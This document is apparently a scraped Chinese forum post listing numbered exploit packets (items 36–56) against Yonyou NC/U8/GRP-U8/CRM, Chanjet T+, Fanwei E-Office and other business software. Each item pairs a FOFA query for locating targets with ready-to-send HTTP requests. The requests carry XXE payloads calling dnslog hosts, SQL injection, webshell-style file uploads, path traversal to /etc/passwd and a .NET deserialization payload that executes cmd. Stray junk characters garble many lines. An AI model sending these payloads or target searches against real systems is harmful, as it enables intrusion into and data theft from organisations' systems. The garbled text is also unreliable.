accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA# [7 C& q+ r7 F6 o
Content-Length: 190
' ]0 n3 s+ ~0 D5 BContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df06 Z6 ? p" }! `4 W6 s: l. D4 R# P
; y9 ?& G. S- u o6 ^--fd28cb44e829ed1c197ec3bc71748df0, m( s: \* j, E& x
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"; ~+ [, T& @) w T" w# w( S
/ e/ j$ u u$ N0 X: B* C! u& B" R<%out.println(1111*1111);%>
# B8 L8 Q% |; Q--fd28cb44e829ed1c197ec3bc71748df0--" B }% }: j$ B* ]
" t# u* k# F. e. o' p
* ?" d4 `) g* M4 K2 l2 \36. 用友NC-Cloud soapFormat XXE
" a% O2 t1 A/ Z' F% d$ IFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
/ j2 \4 O, d8 N" cPOST /uapws/soapFormat.ajax HTTP/1.1
+ N k9 p( r7 M! E. e+ f# WHost: 192.168.40.130:8989
. _; L. }' ^; o `7 L( s- ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
6 h# _% _5 k- m/ q1 [Content-Length: 2630 m3 t8 m0 s- e- D' i& b& T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 H2 o/ [* K$ R7 w0 j( V- p
Accept-Encoding: gzip, deflate4 F. C8 b5 k) j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ q4 y, a I6 Z s
Connection: close, X& [. L1 |, W8 L: A. P
Content-Type: application/x-www-form-urlencoded
& O, c* @! J0 e# tUpgrade-Insecure-Requests: 1" N- I; o3 D4 g$ [
5 e1 v7 @, \# A
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a1 }3 ?0 j: [, @6 X" r
' m( y2 J+ x0 T: q; W/ F# [
K! i2 t$ M0 a; e8 h/ U
37. 用友NC-Cloud IUpdateService XXE* I1 _0 i$ x0 D: F* w( k
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"; M7 V" A4 S$ P. L# S
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
; \3 K% H$ e% u) C. k5 K KHost: 192.168.40.130:8989
. v; j- A( h' u7 ^, o( x+ dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36, }4 `$ U. k; h- x( D$ v, C
Content-Length: 421* z; q1 O' }2 l8 M9 M+ @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.95 F* B) T( V( x- v1 n! k
Accept-Encoding: gzip, deflate
$ R }* Q) g3 k1 NAccept-Language: zh-CN,zh;q=0.9& @; G/ X) E3 R. c: A f- z5 s- Q2 {
Connection: close7 M! p- k# E) t& ~" M1 l
Content-Type: text/xml;charset=UTF-8! S/ j( Y9 E/ b; \ H. X9 ~* s
SOAPAction: urn:getResult$ }% k7 y* D$ y: ^, G% z5 p Q
Upgrade-Insecure-Requests: 1, I; w1 q7 i4 a4 A0 P* {9 p7 U
& x" A* l& [4 L6 |! w
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
8 h7 {# v- P$ a<soapenv:Header/>- @8 m( @8 a, g$ G' O" |2 U# }3 y
<soapenv:Body>( h. Q5 o; h& Q% C( Z3 T
<iup:getResult>
, R& }4 B8 r* l" g) e<!--type: string-->
2 H! |5 K2 o% C( ~* E9 X& Y<iup:string><![CDATA[8 c" y- C( B1 I# x2 u3 R
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>% q3 c& ~: X$ q- P
<xxx/>]]></iup:string>- B% c& f2 x z/ ]" C
</iup:getResult>
% Q6 }4 `0 v- t. ^4 N: c</soapenv:Body>
' Y+ p) }$ Z9 O& H5 z- r n) S</soapenv:Envelope>
, S0 Y, ~+ N8 g8 [2 p$ j0 c$ a* O
& d& i- |3 y) d7 _0 ]5 S2 ]% c
s n7 w2 N' \2 s
38. 用友U8 Cloud smartweb2.RPC.d XXE4 {/ Z* h: t B' {
FOFA:app="用友-U8-Cloud"9 B1 y9 k( ]+ s& R/ U4 a
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1! G! S8 k1 f2 m7 d- ~9 t, u& N' i
Host: 192.168.40.131:8088
2 c# o: ~: R: O! e- A% QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25" O+ I" L/ S) d9 i6 N0 f* A D
Content-Length: 260
8 k- c# S. I8 p% _. Z2 PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
2 ~. k" B% l+ p: u% O# |0 vAccept-Encoding: gzip, deflate5 J& Q' z# U" A3 M
Accept-Language: zh-CN,zh;q=0.9
. P$ I( s( L5 C( e2 z8 \Connection: close
, z$ y. u! f8 x P$ c6 K7 J( vContent-Type: application/x-www-form-urlencoded* r$ C9 S5 U1 L# I: _
x2 f2 f& \6 r0 K/ ^6 x( S
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>1 S3 J/ b3 J1 D& o- w e5 a+ L6 A
8 ^) w" K/ ^$ ]4 Q' E
6 A' o% [5 o, f" h2 n+ {( f39. 用友U8 Cloud RegisterServlet SQL注入
' u9 s2 O+ Y$ R( Q3 K+ @& Q: LFOFA:title="u8c"2 t! w" R5 j. K7 Z2 h& |- u3 l
POST /servlet/RegisterServlet HTTP/1.1
( W9 p7 Z9 j" i1 i xHost: 192.168.86.128:8089
H9 K/ P& L- c$ I& D/ fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
/ H# ~3 b( F7 {' a& VConnection: close
# B2 s# G. t4 H# V% c% b! lContent-Length: 856 }9 N: q- M+ O# _' j
Accept: */*
3 n2 |4 Y$ G4 J2 a7 s9 e$ H6 D8 xAccept-Language: en
0 q+ e) c! c1 }/ y3 P8 Z+ jContent-Type: application/x-www-form-urlencoded
3 x3 U" ^6 ?- Z9 ?X-Forwarded-For: 127.0.0.12 Y* N2 y( F! l; \/ b d
Accept-Encoding: gzip4 W7 {8 h) h2 `& P9 d
9 C: u1 I6 r9 |7 ~& x; v$ L# c
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--+ E- e& H8 s3 t
# [( M4 g& h$ S4 b/ P
! h* N. Y( A; Y7 ~+ R$ a40. 用友U8-Cloud XChangeServlet XXE3 ? g3 ^# O5 z; _7 L4 _
FOFA:app="用友-U8-Cloud"
0 f" n- C, i' D V# a4 {POST /service/XChangeServlet HTTP/1.17 n; m. r* [7 g0 t: B# N
Host: x.x.x.x" C4 s3 u9 V3 E4 J+ G) e
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36, [9 {% W, l3 x2 l+ f. _
Content-Type: text/xml
( l& [- o3 l/ f$ y' A P- i yConnection: close' i0 [7 B# G) {+ _: \& W
$ A" d/ S5 ^/ D/ d<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
( e7 W5 v2 @+ Q. A; M: `+ P* v: D& f" H* _4 S; o6 Q. n
$ ?. H6 H3 T- U1 k! g1 [" Y+ N$ _; _41. 用友U8 Cloud MeasureQueryByToolAction SQL注入9 u3 q) M2 t' W: P! p- }
FOFA:app="用友-U8-Cloud"
7 g$ V" V8 k, s' F" }0 |; UGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1" K: R4 z1 L7 r7 m" K
Host:
5 f+ G' a+ e5 H1 }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ @/ S8 M$ T. y- u$ j
Content-Type: application/json) d% H# \; ?3 V; S b
Accept-Encoding: gzip2 c0 S7 }- ^- D& E" c* t
Connection: close
" E/ ^0 h% F! o3 J8 f
1 f1 T0 ] H8 r) v' ~: x- i, R$ R4 w
42. 用友GRP-U8 SmartUpload01 文件上传1 Y" e8 @, h3 }5 b4 U4 s
FOFA:app="用友-GRP-U8"
2 z/ D+ m/ l/ G6 d7 @POST /u8qx/SmartUpload01.jsp HTTP/1.1& B5 \) |& }. E/ i3 \. x% }; y
Host: x.x.x.x
; B7 t7 u8 B& ]( pContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt" z3 m8 Q" P* `) w& b; k+ \$ ~9 ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
/ b- X s+ [! p, ?! N* ?$ ^( B% U2 Z- k+ d: I* T) k
PAYLOAD
: h8 v& o1 v: f) f" i. Y
7 V( m; m& S0 U, x M) I
7 N- r! |! p3 j' [http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
+ U# J" z. i. v) a: Z
% { a4 ]* w, K! |6 q9 ~43. 用友GRP-U8 userInfoWeb SQL注入致RCE% k" P2 G/ z# Q
FOFA:app="用友-GRP-U8"/ c: \9 R7 [* v+ c0 X7 T
POST /services/userInfoWeb HTTP/1.1
' m0 u* s, Y! }. _# [Host: your-ip
# b' v. k5 p* w: H9 GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 c7 ~8 K0 T/ P* I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* M" W3 d8 F5 q
Accept-Encoding: gzip, deflate: T* X0 @/ N2 t" v# L
Accept-Language: zh-CN,zh;q=0.9) e$ [4 g/ o/ g: g6 x1 U; m; d- c
Connection: close
3 ?" {0 y! ^: d$ b( J8 Y5 O. [& wSOAPAction:
4 x3 Y3 ^, z$ }$ r I0 @Content-Type: text/xml;charset=UTF-8
1 f, Y- X3 z1 O6 p V. p& v* _! @% m% P# _' L
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
* ~! d) K/ L! c3 y2 | <soapenv:Header/>
# O$ X1 K, X2 S' ?( B( H& B <soapenv:Body>& E( f4 H5 @! v9 c4 u+ e, T# m
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">1 a6 g1 X1 y% A* v7 K
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
) k5 ~9 e" ^1 f# T3 a8 n. | </ser:getUserNameById>
/ {9 T) q) H0 q9 `, X- O </soapenv:Body>
/ d, M' c. d& H; i6 O2 O</soapenv:Envelope>- g( u3 D9 u1 B; D% J0 ~
: }# { |9 P8 M
4 j9 P _! \) J! h6 V44. 用友GRP-U8 bx_dj_check.jsp SQL注入
* A3 M+ B" R' I; HFOFA:app="用友-GRP-U8"
8 U7 A$ A! W1 F0 |2 K3 r" _GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
' @5 |$ G2 ?- W) H) mHost: your-ip
* m; k# ]* T% i! `4 GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
& Z8 k* P9 D* e$ W1 k# ~$ ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! \- D3 f, B: H4 g* _1 E# O9 tAccept-Encoding: gzip, deflate" R4 ]/ P% D% V) {5 D2 W m
Accept-Language: zh-CN,zh;q=0.90 r9 T6 d* c9 I5 M
Connection: close
- M+ v$ `4 k# s7 l$ L3 C& [# J- G0 E$ r1 z) {: F
' N+ N M; x& i1 A5 r6 O4 K6 H
45. 用友GRP-U8 ufgovbank XXE; S; n" ^* I d: b' K8 h% z4 F
FOFA:app="用友-GRP-U8"
& N+ h1 m. ?9 T" n, }" RPOST /ufgovbank HTTP/1.1
* _! _' Y, Z8 O: C% qHost: 192.168.40.130:222
R. W* `: E1 j, |/ i; B4 R! HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0( q$ d8 V# A& a0 W& C, s$ U6 S4 j
Connection: close
5 w2 H* g5 w; xContent-Length: 161
! g- L( d+ \! EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ E5 I3 W- v0 C% ~9 t3 O- w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" @, y. o1 O% _3 ~. @Content-Type: application/x-www-form-urlencoded8 X1 A+ J$ g% o6 K- Z* m
Accept-Encoding: gzip
, \* R# @! ]2 @+ H+ S" f+ c. @+ j; c
$ w8 U+ [* u8 x% W+ z" Z2 JreqData=<?xml version="1.0"?>
$ H% C" x5 u' Z+ I<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
/ u+ R; t7 x, b( ~9 Q) R5 W4 s! n+ z; [+ K+ ]: g& y, G7 y+ X
5 S6 A( d3 \7 _3 G3 Y
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
9 T2 Q1 U0 y3 E; {FOFA:app="用友-GRP-U8"
7 T% e4 q" K- f/ L8 t& W7 h hGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1% [- X* A, S9 }( O7 d
Host: your-ip
. b0 Z' C* g, QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
( u% H% C! U; KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
F A, Y5 c8 R2 r. J( l OAccept-Encoding: gzip, deflate
! w0 m/ V! U0 W0 mAccept-Language: zh-CN,zh;q=0.9+ u5 D, x+ k' `. W
Connection: close; s' p5 f& y$ P y: h
. X/ w6 c- W# |( o: O
* O# d% g' \$ ^9 z: c' k7 v( s, m, R47. 用友GRP A++Cloud 政府财务云 任意文件读取4 ~* g* b9 \7 ]4 A# l& _
FOFA:body="/pf/portal/login/css/fonts/style.css"
+ h. q0 i- d, I+ X; C b' cGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.16 ?+ ] g: r1 a' ]- @+ V
Host: x.x.x.x& p6 g5 u7 Z# I4 ]0 A
Cache-Control: max-age=00 x1 d7 n; Z0 G" ~% b3 a' `
Upgrade-Insecure-Requests: 1
+ X6 J1 x/ ?8 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.369 t: o9 z, O( u- h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& q" [. Z: ~9 H- D3 M" b# a& R# SAccept-Encoding: gzip, deflate, br
8 L* N4 l5 F8 k' R' w0 M1 l: N# c1 U- q; {Accept-Language: zh-CN,zh;q=0.9
$ S" d3 T- u% h% _6 l* d( j7 p& f* K5 eIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT/ n; C0 g, d- g
Connection: close! Y4 U% n8 @, q' J. k
/ r6 ^9 |1 b! W& k. Q5 y# H% r: u, O) L& k" A: O1 n
1 e3 x, M' I& _. K2 p- H- V
48. 用友U8 CRM swfupload 任意文件上传6 a4 \/ q- r; H( c* T8 i
FOFA:title="用友U8CRM"
$ X$ z/ T# x& P" I- B& _0 bPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
; h" W9 m/ _* D9 J& bHost: your-ip! m- C4 c- F" c# Y; k2 _$ P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
2 e( g; S* r# `& ~6 H1 QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 G4 ?6 q# S: m# E4 _2 gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- ~- T+ m. H4 ]! n% \: ]% m, Q
Accept-Encoding: gzip, deflate& C- i6 B: L6 b& S5 x$ a8 I) d
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
6 k9 K: d; w3 P! o G4 U$ I' N: x0 e------269520967239406871642430066855
/ [& C7 K& x X9 @Content-Disposition: form-data; name="file"; filename="s.php"& {8 x/ F& }. B$ G# t
1231
! s! a& ?; s% r! [Content-Type: application/octet-stream
3 h: R- [' ?1 E( z2 }) Z8 x------269520967239406871642430066855
, u6 I2 z) [) _& ?: V3 RContent-Disposition: form-data; name="upload"7 w+ E8 y7 q# q) Q5 x% X q7 U9 B
upload ^( n- ^. u# N, d. o1 C
------269520967239406871642430066855--
/ ?0 a) L; y$ c, Q b. A2 B& ^+ {( D- `
2 ~. u4 J5 D* u5 i9 S8 i49. 用友U8 CRM系统uploadfile.php接口任意文件上传3 B* ?/ q+ p+ u, X8 a8 U4 I5 j( i* m
FOFA:body="用友U8CRM"
9 f' t6 Z; G2 m/ F& y
5 T ?% ?9 H6 EPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
5 F8 C8 Y' A8 c3 _9 I# W! xHost: x.x.x.x" n+ J8 K+ F; G7 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.09 o; D' \4 ?0 J# \$ }0 R+ _# g) l
Content-Length: 329
, r6 v, D# c& x+ a7 Z% }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 B, n+ A9 g) FAccept-Encoding: gzip, deflate; u6 R" l/ R. V( ?5 X8 V* T' Z6 k+ {. ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) E; f8 h9 k( T0 n2 h6 c+ d
Connection: close$ V/ M$ z: Z% z1 S9 T
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w& j; o0 ^9 e& [6 e; i
* I& i! @3 C+ ^& o9 L. J
-----------------------------vvv3wdayqv3yppdxvn3w/ r4 f3 w' ]0 f8 K0 x- ^% |
Content-Disposition: form-data; name="file"; filename="%s.php "* q" r* Q f2 U0 l
Content-Type: application/octet-stream
# b5 G& z8 D. w9 t
# f2 }7 Z$ F4 _) {/ K7 Ewersqqmlumloqa
+ `7 h* H. N& p4 ~, u1 y3 K-----------------------------vvv3wdayqv3yppdxvn3w' Q. J7 a4 s0 d
Content-Disposition: form-data; name="upload"8 W6 m) L$ Q- X8 i: f+ T" N0 v
$ G% H! c. ^8 Uupload
* }, Z+ A; w" E. G-----------------------------vvv3wdayqv3yppdxvn3w--: \/ S1 T* {! Q2 x0 a* G
+ m" a" n5 g3 C P. x$ H9 `3 H& p) k; z6 y/ |: v( T
http://x.x.x.x/tmpfile/updB3CB.tmp.php
* ?, R# A- l$ ^* d1 d" n! T
1 C- h& ~ n3 v( v7 n* z3 Y50. QDocs Smart School 6.4.1 filterRecords SQL注入$ E) A2 X6 D- r: ?& B4 W9 A
FOFA:body="close closebtnmodal"& L, p. O6 N- H5 H6 w' I6 w# }
POST /course/filterRecords/ HTTP/1.1
. m$ Y- v& j( M' ]$ v S& ?Host: x.x.x.x
b, o: G5 Y5 g6 }. yUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 U: d) i+ ]; |: v1 S% R- u7 w( FConnection: close! g! K5 F/ \ g7 p. |) ~
Content-Length: 2247 Y4 @' A3 j/ B- X, \! D+ ^
Accept: */*8 v$ ]2 y4 ?$ T6 ]3 `
Accept-Language: en; N( R% Z! x, Z: @, |& E
Content-Type: application/x-www-form-urlencoded4 f( t2 w) Q- n* F8 q2 `
Accept-Encoding: gzip
5 [, L1 P5 z% e+ v6 d: F2 o% T2 T- X! V" @8 A
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
3 n. {' R) d: z' b) I+ k: ^- ^; @( x% i' ?5 C {* A& `/ v: ?9 {
r# V J6 C- ]- E8 ^: `; c2 ^
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入1 m9 R0 I* F% J: O. O8 [
FOFA:app="云时空社会化商业ERP系统"
$ |4 \ s3 s' Q, wGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1- K2 Z- @% H5 A0 |( k
Host: your-ip
: B: ?9 i. s/ T3 z' R) kUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36' S: d. N: A, Y9 z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9! y& {1 v% n3 i
Accept-Encoding: gzip, deflate
: x7 e) [( c9 T1 H I# OAccept-Language: zh-CN,zh;q=0.9& y) F2 N" ]4 a2 R, B/ ^! S3 h
Connection: close7 E; b( Y* x7 n. }: ~" Z3 B& a
% s5 x8 p/ D. O
* w3 {7 b5 x' w; E; a52. 泛微E-Office json_common.php sql注入" ^. w- X4 S( l. n" W: f( @0 w
FOFA:app="泛微-EOffice"
8 j$ V& Y2 k+ ~POST /building/json_common.php HTTP/1.1! G' b+ c7 s$ F
Host: 192.168.86.128:80971 c8 H1 J' l9 Q& Z8 x' u* y
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
/ X+ |( r* m) y' j, } X. M* `Connection: close1 h# R5 L* V* Z) A
Content-Length: 877 F! t- c& Y9 @: D
Accept: */*2 @$ I3 ?8 M6 |; }
Accept-Language: en
" q3 D! Q- m9 d3 C, i5 LContent-Type: application/x-www-form-urlencoded
+ M/ t5 f; o. f# x7 D- W' b @Accept-Encoding: gzip2 H4 X; }+ F! Y0 H& `
% f9 E3 v" {8 v1 [
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3330 j' ~& \7 b$ M( v" Z4 ^
- F0 [6 T* @, X) g
* C% w0 E( j4 b0 R
53. 迪普 DPTech VPN Service 任意文件上传" s9 o, r. G. ^
FOFA:app="DPtech-SSLVPN": U2 P5 Q6 p& c: F1 y7 W' b1 e
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd& R) J# j+ ~- y7 p# R" o2 u
+ ]! e0 b2 y! o. ]- T) [! W+ [1 D* k9 O. [3 J
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
. `3 h$ m: g; o+ |' w, U fFOFA:app="畅捷通-TPlus"6 c" k v6 H$ i; U
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
" d0 A: P1 `; P" k' `+ b"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
1 a1 W+ J9 C) [2 w& V$ x
5 Y o9 j; z% A% l- n$ |& h8 X
1 ~: g( S& [! S/ I( }( q7 x! M, p完整数据包
, ]5 ]1 p8 h1 G3 W' lPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1! U7 J: ^' L9 N4 h" d; y
Host: x.x.x.x( {1 N( R! b e
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F/ C" a2 a; B4 e0 ^. T1 B1 o1 i
Content-Length: 593* w. I$ q4 Y/ Y- k) J
9 k) t2 V4 K2 P! W) e% M{3 t& _7 h4 E/ m/ R4 {8 c+ d
"storeID":{
( o( w$ n' q2 _ "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",! d* ~/ I) [7 d- p
"MethodName":"Start",8 j* j3 I0 w& q5 l
"ObjectInstance":{1 n: W% y$ d N
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
4 b4 B6 i0 v' x3 _* ]2 g5 L- k "StartInfo":{
3 x6 u- F; E" e" M$ [ "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",+ S, {1 c, y1 N3 h1 {
"FileName":"cmd",$ Y9 |6 l5 U# D1 f# W3 e
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"9 y0 M- |+ Y8 _+ P. z
}9 L8 T2 K6 m3 D7 D5 E1 N8 V& c$ r
}
7 K. p4 \6 M* t* u }
+ J6 N, W% U; E}7 ~# k. T: M/ u7 c- K
4 c4 S, a: S% j. l/ [: b: W8 Y" r
- ]% T3 S3 n. S4 v: J第二步,访问如下url$ T8 }! x/ z B' b- B/ g
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt& `% E& [4 n7 z4 A* N6 N" n
* Y6 I% \, o8 h; L" T; s& f9 K b& O. c. E! @" {
55. 畅捷通T+ getdecallusers信息泄露$ e! k% ]6 X8 R/ |. i1 \
FOFA:app="畅捷通-TPlus"
$ i- S# I0 F2 E; ], |/ o9 b, M第一步,通过
5 Z& W1 W' d" A& `' Y/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
3 ~; z7 b" f: Y第二步,利用获取到的Cookie请求' U2 O, }/ D* |, Q9 v0 b$ N+ w+ d
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
' s9 N" w4 T) v8 [9 P" s6 H. |# {' I6 H0 Q& ~; ]
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
3 m" P: U9 r' p; q- [8 Z PFOFA: app="畅捷通-TPlus"
0 S* _* q9 o [" d) yPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
9 n5 u6 r2 S/ j1 ~ J: S, ?Host: x.x.x.x
2 h6 r0 {5 m( x- yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
/ e @. k; U) d2 J* m2 JContent-Type: application/json% ?9 M y! }! K6 E* w4 s
6 D4 w# S, [ l) K{+ |- B4 N* L/ r8 O% D4 B
"storeID":{
" T4 w0 y; f: W "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
